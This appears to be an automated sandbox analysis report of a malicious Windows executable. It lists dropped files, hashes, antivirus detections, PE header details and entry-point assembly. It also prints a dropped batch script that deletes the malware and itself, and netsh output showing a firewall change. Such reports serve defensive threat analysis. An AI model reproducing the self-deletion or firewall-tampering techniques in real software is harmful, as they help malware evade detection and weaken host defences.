            MD5:16AB569E9D84F0A2C9AACD47D4998D84
            SHA1:DF051511743F94A52BDBC270C4E5BF0D303D6975
            SHA-256:7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
            SHA-512:614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data.........*.....................@.....d.u...`....9..B...F.............. .....fl...:.v.2.*........................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):4
            Entropy (8bit):1.5
            Encrypted:false
            SSDEEP:3:Nv:9
            MD5:D3B07384D113EDEC49EAA6238AD5FF00
            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
            Malicious:false
            Preview:foo.
            Process:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):4
            Entropy (8bit):1.5
            Encrypted:false
            SSDEEP:3:Nv:9
            MD5:D3B07384D113EDEC49EAA6238AD5FF00
            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
            Malicious:false
            Preview:foo.
            Process:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):4
            Entropy (8bit):1.5
            Encrypted:false
            SSDEEP:3:Nv:9
            MD5:D3B07384D113EDEC49EAA6238AD5FF00
            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
            Malicious:false
            Preview:foo.
            Process:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):4
            Entropy (8bit):1.5
            Encrypted:false
            SSDEEP:3:Nv:9
            MD5:D3B07384D113EDEC49EAA6238AD5FF00
            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
            Malicious:false
            Preview:foo.
            Process:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):4
            Entropy (8bit):1.5
            Encrypted:false
            SSDEEP:3:Nv:9
            MD5:D3B07384D113EDEC49EAA6238AD5FF00
            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
            Malicious:false
            Preview:foo.
            Process:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):4
            Entropy (8bit):1.5
            Encrypted:false
            SSDEEP:3:Nv:9
            MD5:D3B07384D113EDEC49EAA6238AD5FF00
            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
            Malicious:false
            Preview:foo.
            Process:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):4
            Entropy (8bit):1.5
            Encrypted:false
            SSDEEP:3:Nv:9
            MD5:D3B07384D113EDEC49EAA6238AD5FF00
            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
            Malicious:false
            Preview:foo.
            Process:C:\Users\user\AppData\Local\Temp\server.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):1214464
            Entropy (8bit):7.958532392669138
            Encrypted:false
            SSDEEP:24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
            MD5:16AB569E9D84F0A2C9AACD47D4998D84
            SHA1:DF051511743F94A52BDBC270C4E5BF0D303D6975
            SHA-256:7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
            SHA-512:614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data.........*.....................@.....d.u...`....9..B...F.............. .....fl...:.v.2.*........................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):4
            Entropy (8bit):1.5
            Encrypted:false
            SSDEEP:3:Nv:9
            MD5:D3B07384D113EDEC49EAA6238AD5FF00
            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
            Malicious:false
            Preview:foo.
            Process:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):4
            Entropy (8bit):1.5
            Encrypted:false
            SSDEEP:3:Nv:9
            MD5:D3B07384D113EDEC49EAA6238AD5FF00
            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
            Malicious:false
            Preview:foo.
            Process:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):4
            Entropy (8bit):1.5
            Encrypted:false
            SSDEEP:3:Nv:9
            MD5:D3B07384D113EDEC49EAA6238AD5FF00
            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
            Malicious:false
            Preview:foo.
            Process:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):196
            Entropy (8bit):5.003210364942915
            Encrypted:false
            SSDEEP:6:jdKoN723fRZMD2UN723fRj/dKoN723fkn:jIMaJYaJj/IMaMn
            MD5:00429F0ED357144B21F3D993896D9FA9
            SHA1:0370EF87824534AB3A8FFAF946D5D1D37BFDA519
            SHA-256:1CF3D318DBE8109725B61F2CDD46184606065B74F7D1497BA8035E1FCFE45CC8
            SHA-512:C70C27C393D70CC875A8749369834D3C381A4C1BFF90399A75E2B967BFA2DAB00BA5F35C817B90473F26FEC6BA55BAFA21B42C4F210BEF9622F33927C788669A
            Malicious:false
            Preview::DELFILE..del "C:\Users\user\AppData\Local\Temp\RRqyIX.exe"..if exist "C:\Users\user\AppData\Local\Temp\RRqyIX.exe" goto :DELFILE..del "C:\Users\user\AppData\Local\Temp\2266597f.bat"..
            Process:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):196
            Entropy (8bit):4.955025648699968
            Encrypted:false
            SSDEEP:6:jdKoN723fRZMD2UN723fRj/dKoN723fuQeSn:jIMaJYaJj/IMaXeSn
            MD5:80CBA390C37BC1D6FE1F8A880B91D538
            SHA1:F12C6E52C2CD413FC8878B35A49C8698E03CAFFE
            SHA-256:6A4D2A054CC21DEBF1D1A92719449F32B4A1CF03488CDCDDFB59DEC0602A0A2D
            SHA-512:B42D6751D4366D83E7C0C0394B08400EAC1F8F7052EEAB71B8ABCBC6F61EF835B02D040157F75BE86C174DE10A3518DDF4490F9032DA717BD76B7CCF74A85488
            Malicious:false
            Preview::DELFILE..del "C:\Users\user\AppData\Local\Temp\RRqyIX.exe"..if exist "C:\Users\user\AppData\Local\Temp\RRqyIX.exe" goto :DELFILE..del "C:\Users\user\AppData\Local\Temp\24de2542.bat"..
            Process:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):4
            Entropy (8bit):1.5
            Encrypted:false
            SSDEEP:3:Nv:9
            MD5:D3B07384D113EDEC49EAA6238AD5FF00
            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
            Malicious:false
            Preview:foo.
            Process:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            File Type:ASCII text
            Category:modified
            Size (bytes):4
            Entropy (8bit):1.5
            Encrypted:false
            SSDEEP:3:Nv:9
            MD5:D3B07384D113EDEC49EAA6238AD5FF00
            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
            Malicious:false
            Preview:foo.
            Process:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):4
            Entropy (8bit):1.5
            Encrypted:false
            SSDEEP:3:Nv:9
            MD5:D3B07384D113EDEC49EAA6238AD5FF00
            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
            Malicious:false
            Preview:foo.
            Process:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):4
            Entropy (8bit):1.5
            Encrypted:false
            SSDEEP:3:Nv:9
            MD5:D3B07384D113EDEC49EAA6238AD5FF00
            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
            Malicious:false
            Preview:foo.
            Process:C:\Users\user\Desktop\LisectAVT_2403002B_366.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):15872
            Entropy (8bit):7.031075575407894
            Encrypted:false
            SSDEEP:384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
            MD5:F7D21DE5C4E81341ECCD280C11DDCC9A
            SHA1:D4E9EF10D7685D491583C6FA93AE5D9105D815BD
            SHA-256:4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
            SHA-512:E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\LisectAVT_2403002B_366.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):1214464
            Entropy (8bit):7.958532392669138
            Encrypted:false
            SSDEEP:24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
            MD5:16AB569E9D84F0A2C9AACD47D4998D84
            SHA1:DF051511743F94A52BDBC270C4E5BF0D303D6975
            SHA-256:7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
            SHA-512:614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data.........*.....................@.....d.u...`....9..B...F.............. .....fl...:.v.2.*........................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\server.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):1214464
            Entropy (8bit):7.958532392669138
            Encrypted:false
            SSDEEP:24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
            MD5:16AB569E9D84F0A2C9AACD47D4998D84
            SHA1:DF051511743F94A52BDBC270C4E5BF0D303D6975
            SHA-256:7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
            SHA-512:614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data.........*.....................@.....d.u...`....9..B...F.............. .....fl...:.v.2.*........................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\server.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):1214464
            Entropy (8bit):7.958532392669138
            Encrypted:false
            SSDEEP:24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
            MD5:16AB569E9D84F0A2C9AACD47D4998D84
            SHA1:DF051511743F94A52BDBC270C4E5BF0D303D6975
            SHA-256:7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
            SHA-512:614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data.........*.....................@.....d.u...`....9..B...F.............. .....fl...:.v.2.*........................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\server.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):1214464
            Entropy (8bit):7.958532392669138
            Encrypted:false
            SSDEEP:24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
            MD5:16AB569E9D84F0A2C9AACD47D4998D84
            SHA1:DF051511743F94A52BDBC270C4E5BF0D303D6975
            SHA-256:7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
            SHA-512:614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data.........*.....................@.....d.u...`....9..B...F.............. .....fl...:.v.2.*........................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\LisectAVT_2403002B_366.exe
            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
            Category:dropped
            Size (bytes):5
            Entropy (8bit):2.321928094887362
            Encrypted:false
            SSDEEP:3:j:j
            MD5:CAC4598FDC0F92181616D12833EB6CA1
            SHA1:80A7B7A46A0E8E674B782B9EB569E5430A69C84B
            SHA-256:275918973C23AD700F278C69CC03C9C82EC9F4D9ED0F53111AD22BEC197FF440
            SHA-512:01A7556BFCCE6D9D8251AADC7F6E6169FDD0477D487CE88729C44BFE8B85B2EEE500985D553C0479765EF5B5C6DC3517C0305EFB9089814C3F8A9EA6FC51C713
            Malicious:false
            Preview:.25
            Process:C:\Users\user\AppData\Local\Temp\server.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):1214464
            Entropy (8bit):7.958532392669138
            Encrypted:false
            SSDEEP:24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
            MD5:16AB569E9D84F0A2C9AACD47D4998D84
            SHA1:DF051511743F94A52BDBC270C4E5BF0D303D6975
            SHA-256:7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
            SHA-512:614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data.........*.....................@.....d.u...`....9..B...F.............. .....fl...:.v.2.*........................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\server.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):1214464
            Entropy (8bit):7.958532392669138
            Encrypted:false
            SSDEEP:24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
            MD5:16AB569E9D84F0A2C9AACD47D4998D84
            SHA1:DF051511743F94A52BDBC270C4E5BF0D303D6975
            SHA-256:7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
            SHA-512:614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data.........*.....................@.....d.u...`....9..B...F.............. .....fl...:.v.2.*........................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\server.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):1214464
            Entropy (8bit):7.958532392669138
            Encrypted:false
            SSDEEP:24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
            MD5:16AB569E9D84F0A2C9AACD47D4998D84
            SHA1:DF051511743F94A52BDBC270C4E5BF0D303D6975
            SHA-256:7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
            SHA-512:614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data.........*.....................@.....d.u...`....9..B...F.............. .....fl...:.v.2.*........................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\server.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):1214464
            Entropy (8bit):7.958532392669138
            Encrypted:false
            SSDEEP:24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
            MD5:16AB569E9D84F0A2C9AACD47D4998D84
            SHA1:DF051511743F94A52BDBC270C4E5BF0D303D6975
            SHA-256:7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
            SHA-512:614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data.........*.....................@.....d.u...`....9..B...F.............. .....fl...:.v.2.*........................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            File Type:MS Windows registry file, NT/2000 or above
            Category:dropped
            Size (bytes):1835008
            Entropy (8bit):4.469008114169889
            Encrypted:false
            SSDEEP:6144:9zZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNwjDH5S/:VZHtBZWOKnMM6bFpCj4
            MD5:16D7CA29758C0D09604A6597E91E058D
            SHA1:9AB0A1718F263E4AFE8F089E4BA766559847AB2B
            SHA-256:19EC8AA4574AC4D018A98201BBF94F5970B71FF4DBA90B2B538EA2048D8024E7
            SHA-512:B7123EB0730351C5D765B9B1301DB4642C51BC8269F3E3831B2D9F66E7A23E1EF3459A18E50A1BBD90207AAC1042B5F19221666EF479D3C7B7E9577598B7FFE2
            Malicious:false
            Preview:regfI...I....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.I8.................................................................................................................................................................................................................................................................................................................................................../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\server.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):1214464
            Entropy (8bit):7.958532392669138
            Encrypted:false
            SSDEEP:24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
            MD5:16AB569E9D84F0A2C9AACD47D4998D84
            SHA1:DF051511743F94A52BDBC270C4E5BF0D303D6975
            SHA-256:7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
            SHA-512:614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data.........*.....................@.....d.u...`....9..B...F.............. .....fl...:.v.2.*........................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\netsh.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):313
            Entropy (8bit):4.971939296804078
            Encrypted:false
            SSDEEP:6:/ojfKsUTGN8Ypox42k9L+DbGMKeQE+vigqAZs2E+AYeDPO+Yswyha:wjPIGNrkHk9iaeIM6ADDPOHyha
            MD5:689E2126A85BF55121488295EE068FA1
            SHA1:09BAAA253A49D80C18326DFBCA106551EBF22DD6
            SHA-256:D968A966EF474068E41256321F77807A042F1965744633D37A203A705662EC25
            SHA-512:C3736A8FC7E6573FA1B26FE6A901C05EE85C55A4A276F8F569D9EADC9A58BEC507D1BB90DBF9EA62AE79A6783178C69304187D6B90441D82E46F5F56172B5C5C
            Malicious:false
            Preview:..IMPORTANT: Command executed successfully...However, "netsh firewall" is deprecated;..use "netsh advfirewall firewall" instead...For more information on using "netsh advfirewall firewall" commands..instead of "netsh firewall", see KB article 947709..at https://go.microsoft.com/fwlink/?linkid=121488 .....Ok.....
            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):7.958532392669138
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.94%
            • Win16/32 Executable Delphi generic (2074/23) 0.02%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:LisectAVT_2403002B_366.exe
            File size:1'214'464 bytes
            MD5:16ab569e9d84f0a2c9aacd47d4998d84
            SHA1:df051511743f94a52bdbc270c4e5bf0d303d6975
            SHA256:7fb6d8e7d8bd58f1445f0c105d609bd3db7445d55d9abefc18e5e78c06b7a96f
            SHA512:614447286eb0c439dd5eb183e6175f33eaf567475bfefb52cff2b543ace319963d099c6ad3190a31af782395c5cc9b3df34bfc9f8ec7ef0d387106454efe288d
            SSDEEP:24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
            TLSH:054533C316432A59EA2C30B5E4C6A06ADE7AF7D0639E46EF25F54571020C90B2DFA1FD
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................
            Icon Hash:00928e8e8686b000
            Entrypoint:0x79a000
            Entrypoint Section:du
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
            Time Stamp:0x65FD64C5 [Fri Mar 22 11:00:21 2024 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:2e5467cba76f44a088d39f78c5e807b6
            Instruction
            push ebp
            mov ebp, esp
            sub esp, 0000016Ch
            xor eax, eax
            push ebx
            push esi
            push edi
            mov dword ptr [ebp-24h], eax
            mov dword ptr [ebp-10h], eax
            mov dword ptr [ebp-14h], eax
            mov dword ptr [ebp-08h], eax
            mov dword ptr [ebp-0Ch], eax
